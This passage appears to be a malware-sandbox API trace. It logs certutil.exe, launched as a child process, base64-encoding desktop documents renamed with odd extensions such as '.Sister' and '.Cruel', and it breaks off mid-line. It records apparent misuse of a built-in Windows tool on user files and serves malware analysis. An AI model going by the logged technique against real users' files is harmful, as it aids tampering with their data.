[0245.711] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0245.711] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0245.711] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0245.711] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0245.711] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0245.711] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0245.711] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0245.711] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0245.711] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0245.711] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0245.711] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0245.711] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0245.711] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0245.711] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0245.711] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0245.712] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0245.712] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0245.712] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0245.712] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x94313ed88 | out: phkResult=0x94313ed88*=0x23c) returned 0x0 [0245.712] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x1fbe97b5e70 [0245.712] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x94313f2f8, lpData=0x94313f328, lpcbData=0x94313f2f0*=0x4 | out: lpType=0x94313f2f8*=0x0, lpData=0x94313f328*=0x0, lpcbData=0x94313f2f0*=0x4) returned 0x2 [0245.712] LocalFree (hMem=0x1fbe97b5e70) returned 0x0 [0245.712] RegCloseKey (hKey=0x23c) returned 0x0 [0245.712] LocalFree (hMem=0x0) returned 0x0 [0245.712] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x1fbe97de530 [0245.723] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0245.723] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0245.723] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0245.723] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0245.723] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0245.723] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0245.723] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0245.723] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0245.723] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0245.723] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0245.723] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0245.723] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0245.723] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0245.723] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0245.723] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0245.723] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0245.723] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x1fbe97e1b90 [0245.723] GetComputerNameW (in: lpBuffer=0x1fbe97e1b90, nSize=0x94313f2f0 | out: lpBuffer="NQDPDE", nSize=0x94313f2f0) returned 1 [0245.724] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x94313f2c0 | out: lpBuffer=0x0, nSize=0x94313f2c0) returned 0 [0245.724] GetLastError () returned 0xea [0245.724] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1fbe97cb4a0 [0245.724] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x1fbe97cb4a0, nSize=0x94313f2c0 | out: lpBuffer="NQdPdE", nSize=0x94313f2c0) returned 1 [0245.724] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0245.727] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x1fbe97e2230, cbCertEncoded=0x124df) returned 0x0 [0245.764] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x1fbe97e2230, cbCrlEncoded=0x124df) returned 0x0 [0245.766] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x1fbe97e2230, cbEncoded=0x124df, dwFlags=0x8000, pDecodePara=0x94313f1a0, pvStructInfo=0x94313f230, pcbStructInfo=0x94313f224 | out: pvStructInfo=0x94313f230, pcbStructInfo=0x94313f224) returned 0 [0245.766] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x1fbe97e2230, cbEncoded=0x124df, dwFlags=0x8000, pDecodePara=0x94313f1a0, pvStructInfo=0x94313f230, pcbStructInfo=0x94313f224 | out: pvStructInfo=0x94313f230, pcbStructInfo=0x94313f224) returned 0 [0245.767] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x1fbe97e2230, cbEncoded=0x124df, dwFlags=0x8000, pDecodePara=0x94313f1a0, pvStructInfo=0x94313f230, pcbStructInfo=0x94313f224 | out: pvStructInfo=0x94313f230, pcbStructInfo=0x94313f224) returned 0 [0245.767] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x1fbe97bf320 [0245.774] CryptMsgUpdate (hCryptMsg=0x1fbe97bf320, pbData=0x1fbe97e2230, cbData=0x124df, fFinal=1) returned 0 [0245.774] GetLastError () returned 0x8009310b [0245.774] CryptMsgClose (hCryptMsg=0x1fbe97bf320) returned 1 [0245.774] GetFileAttributesExW (in: lpFileName="qyx1bfBq1UB8.odt.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\qyx1bfbq1ub8.odt.sister"), fInfoLevelId=0x0, lpFileInformation=0x94313f250 | out: lpFileInformation=0x94313f250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98dbd970, ftCreationTime.dwHighDateTime=0x1d5ef98, ftLastAccessTime.dwLowDateTime=0x5ab0e890, ftLastAccessTime.dwHighDateTime=0x1d5eef1, ftLastWriteTime.dwLowDateTime=0x5ab0e890, ftLastWriteTime.dwHighDateTime=0x1d5eef1, nFileSizeHigh=0x0, nFileSizeLow=0x124df)) returned 1 [0245.775] _vsnwprintf (in: _Buffer=0x94313f258, _BufferCount=0xb, _Format="%d", _ArgList=0x94313f248 | out: _Buffer="359") returned 3 [0245.775] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x94313f010, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0245.775] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1fbe97e1ce0 [0245.775] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0245.775] _vsnwprintf (in: _Buffer=0x94313e240, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x94313f298 | out: _Buffer="Input Length = 74975") returned 20 [0245.775] GetFileType (hFile=0x50) returned 0x2 [0245.775] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x94313e240*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x94313e1f4, lpReserved=0x0 | out: lpBuffer=0x94313e240*, lpNumberOfCharsWritten=0x94313e1f4*=0x14) returned 1 [0245.869] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0245.869] _vsnwprintf (in: _Buffer=0x94313e240, _BufferCount=0x1ff, _Format="\n", _ArgList=0x94313f298 | out: _Buffer="\n") returned 1 [0245.870] GetFileType (hFile=0x50) returned 0x2 [0245.870] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x94313e240*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x94313e1f4, lpReserved=0x0 | out: lpBuffer=0x94313e240*, lpNumberOfCharsWritten=0x94313e1f4*=0x1) returned 1 [0246.040] GetFileAttributesExW (in: lpFileName="qyx1bfBq1UB8.odt.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\qyx1bfbq1ub8.odt.cruel"), fInfoLevelId=0x0, lpFileInformation=0x94313f250 | out: lpFileInformation=0x94313f250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd35dee6, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xbd35dee6, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xbd3c4a8b, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x192ec)) returned 1 [0246.040] _vsnwprintf (in: _Buffer=0x94313f258, _BufferCount=0xb, _Format="%d", _ArgList=0x94313f248 | out: _Buffer="361") returned 3 [0246.040] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x94313f010, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0246.040] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x1fbe97e2040 [0246.040] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0246.040] _vsnwprintf (in: _Buffer=0x94313e240, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x94313f298 | out: _Buffer="Output Length = 103148") returned 22 [0246.040] GetFileType (hFile=0x50) returned 0x2 [0246.040] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x94313e240*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x94313e1f4, lpReserved=0x0 | out: lpBuffer=0x94313e240*, lpNumberOfCharsWritten=0x94313e1f4*=0x16) returned 1 [0246.146] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0246.146] _vsnwprintf (in: _Buffer=0x94313e240, _BufferCount=0x1ff, _Format="\n", _ArgList=0x94313f298 | out: _Buffer="\n") returned 1 [0246.146] GetFileType (hFile=0x50) returned 0x2 [0246.146] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x94313e240*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x94313e1f4, lpReserved=0x0 | out: lpBuffer=0x94313e240*, lpNumberOfCharsWritten=0x94313e1f4*=0x1) returned 1 [0246.219] LocalFree (hMem=0x1fbe97e2230) returned 0x0 [0246.219] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0246.219] _vsnwprintf (in: _Buffer=0x94313f2b8, _BufferCount=0xb, _Format="%d", _ArgList=0x94313f2a8 | out: _Buffer="2022") returned 4 [0246.220] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x94313f070, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0246.220] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x1fbe97b8e50 [0246.220] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0246.220] _vsnwprintf (in: _Buffer=0x94313e2a0, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x94313f2f8 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0246.220] GetFileType (hFile=0x50) returned 0x2 [0246.220] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x94313e2a0*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x94313e254, lpReserved=0x0 | out: lpBuffer=0x94313e2a0*, lpNumberOfCharsWritten=0x94313e254*=0x31) returned 1 [0246.297] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0246.297] _vsnwprintf (in: _Buffer=0x94313e2a0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x94313f2f8 | out: _Buffer="\n") returned 1 [0246.297] GetFileType (hFile=0x50) returned 0x2 [0246.298] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x94313e2a0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x94313e254, lpReserved=0x0 | out: lpBuffer=0x94313e2a0*, lpNumberOfCharsWritten=0x94313e254*=0x1) returned 1 [0246.415] LocalFree (hMem=0x0) returned 0x0 [0246.416] LocalFree (hMem=0x1fbe97b97a0) returned 0x0 [0246.416] LocalFree (hMem=0x1fbe97b8970) returned 0x0 [0246.416] SetLastError (dwErrCode=0x80070716) [0246.416] _vsnwprintf (in: _Buffer=0x94313f328, _BufferCount=0xb, _Format="%d", _ArgList=0x94313f318 | out: _Buffer="511") returned 3 [0246.416] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x94313f0e0, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0246.416] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1fbe97e1f50 [0246.416] PostQuitMessage (nExitCode=0) [0246.416] GetMessageW (in: lpMsg=0x94313f920, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x94313f920) returned 0 [0246.416] LocalFree (hMem=0x1fbe97cb4a0) returned 0x0 [0246.416] LocalFree (hMem=0x1fbe97e1b90) returned 0x0 [0246.416] LocalFree (hMem=0x0) returned 0x0 [0246.417] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0246.417] GetLastError () returned 0x7e [0246.417] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0246.417] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0246.417] DllMain () returned 0x1 [0246.418] LocalFree (hMem=0x1fbe97cb360) returned 0x0 [0246.418] LocalFree (hMem=0x1fbe97bbc80) returned 0x0 [0246.418] LocalFree (hMem=0x1fbe97e1ce0) returned 0x0 [0246.418] LocalFree (hMem=0x1fbe97e2040) returned 0x0 [0246.418] LocalFree (hMem=0x1fbe97b8e50) returned 0x0 [0246.418] LocalFree (hMem=0x1fbe97e1f50) returned 0x0 [0246.418] LocalFree (hMem=0x1fbe97d4c40) returned 0x0 [0246.418] LocalFree (hMem=0x1fbe97bbb30) returned 0x0 [0246.418] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0246.418] GetLastError () returned 0x7e [0246.418] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0246.418] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0246.418] DllMain () returned 0x1 [0246.419] exit (_Code=0) Thread: id = 75 os_tid = 0x116c Process: id = "27" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x5ef39000" os_pid = "0x1198" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"rBP 3.rtf.Sister\" \"rBP 3.rtf.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 76 os_tid = 0x1184 [0248.483] GetStartupInfoW (in: lpStartupInfo=0xee95d9f6f0 | out: lpStartupInfo=0xee95d9f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"rBP 3.rtf.Sister\" \"rBP 3.rtf.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0248.485] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0248.485] __set_app_type (_Type=0x1) [0248.485] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0248.485] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0248.521] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0248.521] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0248.522] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0248.522] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0248.522] WerSetFlags () returned 0x0 [0248.522] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0248.522] __iob_func () returned 0x7ffcea2dea00 [0248.522] _fileno (_File=0x7ffcea2dea30) returned 1 [0248.522] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0248.522] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0248.523] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0248.524] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0248.524] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0248.524] GetConsoleOutputCP () returned 0x1b5 [0248.592] _vsnwprintf (in: _Buffer=0xee95d9f660, _BufferCount=0xb, _Format=".%d", _ArgList=0xee95d9f588 | out: _Buffer=".437") returned 4 [0248.592] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0248.593] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0248.593] GetFileType (hFile=0x50) returned 0x2 [0248.593] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0248.593] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0248.593] SetThreadUILanguage (LangId=0x0) returned 0x409 [0248.662] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0248.663] GetCommandLineW () returned="certutil -encode \"rBP 3.rtf.Sister\" \"rBP 3.rtf.Cruel\"" [0248.663] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2a83f0fbb00 [0248.663] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2a83f0ec9e0 [0248.663] LocalFree (hMem=0x2a83f0fbb00) returned 0x0 [0248.663] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2a83f0f47f0 [0248.663] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x2a83f0f4430 [0248.663] LocalFree (hMem=0x2a83f0f47f0) returned 0x0 [0248.663] LocalFree (hMem=0x2a83f0ec9e0) returned 0x0 [0248.663] LocalFree (hMem=0x0) returned 0x0 [0248.663] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0248.663] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0248.664] GetCommandLineW () returned="certutil -encode \"rBP 3.rtf.Sister\" \"rBP 3.rtf.Cruel\"" [0248.664] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2a83f0fb8c0 [0248.664] GetSystemTime (in: lpSystemTime=0xee95d9f350 | out: lpSystemTime=0xee95d9f350*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0x17, wMilliseconds=0xcd)) [0248.664] SystemTimeToFileTime (in: lpSystemTime=0xee95d9f350, lpFileTime=0xee95d9f348 | out: lpFileTime=0xee95d9f348) returned 1 [0248.664] FileTimeToLocalFileTime (in: lpFileTime=0xee95d9f348, lpLocalFileTime=0xee95d9f310 | out: lpLocalFileTime=0xee95d9f310) returned 1 [0248.664] FileTimeToSystemTime (in: lpFileTime=0xee95d9f310, lpSystemTime=0xee95d9f080 | out: lpSystemTime=0xee95d9f080) returned 1 [0248.665] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xee95d9f080, lpFormat=0x0, lpDateStr=0xee95d9f190, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0248.665] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xee95d9f080, lpFormat=0x0, lpTimeStr=0xee95d9f090, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0248.665] _vsnwprintf (in: _Buffer=0xee95d9f09e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xee95d9f068 | out: _Buffer=" 23.205s") returned 8 [0248.665] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x2a83f0fe810 [0248.665] SetLastError (dwErrCode=0x80070716) [0248.665] _vsnwprintf (in: _Buffer=0xee95d9f118, _BufferCount=0xb, _Format="%d", _ArgList=0xee95d9f108 | out: _Buffer="948") returned 3 [0248.665] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xee95d9eed0, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0248.665] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2a83f0fb620 [0248.665] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x2a83f0f1c70 [0248.665] LocalFree (hMem=0x2a83f0fe810) returned 0x0 [0248.665] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xee95d9f3c0 | out: lpSystemTimeAsFileTime=0xee95d9f3c0*(dwLowDateTime=0xbed33410, dwHighDateTime=0x1d6141f)) [0248.666] GetLocalTime (in: lpSystemTime=0xee95d9f3f8 | out: lpSystemTime=0xee95d9f3f8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0x17, wMilliseconds=0xce)) [0248.666] SystemTimeToFileTime (in: lpSystemTime=0xee95d9f3f8, lpFileTime=0xee95d9f3d0 | out: lpFileTime=0xee95d9f3d0) returned 1 [0248.666] CompareFileTime (lpFileTime1=0xee95d9f3d0, lpFileTime2=0xee95d9f3c0) returned 1 [0248.666] _vsnwprintf (in: _Buffer=0xee95d9f408, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xee95d9f398 | out: _Buffer="GMT + 2.00") returned 10 [0248.666] LocalFree (hMem=0x2a83f0fb8c0) returned 0x0 [0248.666] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0248.666] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0248.666] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0248.666] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0248.666] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0248.667] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xee95d9f438 | out: _Buffer="10.0.15063.447") returned 14 [0248.667] GetACP () returned 0x4e4 [0248.667] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0248.667] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2a83f0fb780 [0248.667] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2a83f0fb780, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0248.667] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2a83f0fe890 [0248.667] _vsnwprintf (in: _Buffer=0x2a83f0fe890, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xee95d9f488 | out: _Buffer="10.0.15063.447 retail") returned 21 [0248.667] LocalFree (hMem=0x2a83f0fb780) returned 0x0 [0248.667] LocalFree (hMem=0x0) returned 0x0 [0248.667] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0248.667] GetACP () returned 0x4e4 [0248.667] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0248.667] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2a83f0fb920 [0248.667] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2a83f0fb920, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0248.667] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2a83f0fe810 [0248.667] _vsnwprintf (in: _Buffer=0x2a83f0fe810, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xee95d9f488 | out: _Buffer="10.0.15063.447 retail205s") returned 21 [0248.667] LocalFree (hMem=0x2a83f0fb920) returned 0x0 [0248.667] LocalFree (hMem=0x0) returned 0x0 [0248.668] GetACP () returned 0x4e4 [0248.668] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0248.668] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2a83f0fbae0 [0248.668] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2a83f0fbae0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0248.668] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2a83f0fea50 [0248.668] _vsnwprintf (in: _Buffer=0x2a83f0fea50, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xee95d9f4b8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0248.668] LocalFree (hMem=0x2a83f0fbae0) returned 0x0 [0248.668] LocalFree (hMem=0x2a83f0fe890) returned 0x0 [0248.668] LocalFree (hMem=0x2a83f0fe810) returned 0x0 [0248.668] LocalFree (hMem=0x2a83f0fea50) returned 0x0 [0248.668] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0248.668] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0248.668] GetStockObject (i=0) returned 0x900010 [0248.668] RegisterClassW (lpWndClass=0xee95d9f5e0) returned 0xc1a2 [0248.669] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x2402be [0248.789] NtdllDefWindowProc_W () returned 0x0 [0248.790] NtdllDefWindowProc_W () returned 